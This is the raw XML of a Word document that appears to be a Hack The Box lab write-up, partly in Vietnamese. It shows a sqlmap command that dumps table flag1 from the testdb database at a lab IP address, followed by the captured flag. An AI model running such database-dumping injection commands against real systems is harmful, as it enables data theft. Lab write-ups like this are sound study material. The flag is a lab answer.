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7DB8F" w14:textId="3A8F7450" w:rsidR="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00290115">
        <w:t>  What's the contents of table flag1 in the testdb database? (Case #1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11002FF3" w14:textId="78035FE3" w:rsidR="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ta dùng câu lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1044E9BB" w14:textId="1542E268" w:rsidR="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E9C8A3" w14:textId="7783A06F" w:rsidR="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00290115">
        <w:t xml:space="preserve">sqlmap -u "http://94.237.54.42:56927/case1.php?id=1" -T flag1 -D testdb </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00290115">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BE6B34" w14:textId="40852DD7" w:rsidR="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37026D0E" w14:textId="41EB031B" w:rsidR="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE2EA4A" wp14:editId="62C7C799">
            <wp:extent cx="5943600" cy="2882265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122425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57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6B00" w14:textId="79B8076A" w:rsidR="00290115" w:rsidRPr="00290115" w:rsidRDefault="00290115" w:rsidP="00290115">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00290115">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00290115">
        <w:t>HTB{c0n6r475_y0u_kn0w_h0w_70_run_b451c_5qlm4p_5c4n}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B96BEE8" w14:textId="0F931B96" w:rsidR="009A0748" w:rsidRDefault="009A0748" w:rsidP="00290115">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009A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291C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8398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719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48"/>
    <w:rsid w:val="001A57CB"/>
    <w:rsid w:val="00290115"/>
    <w:rsid w:val="009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D6F9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4B6213B3-35B5-4C8A-8016-C62E7EDF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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-26T16:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-26T16:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>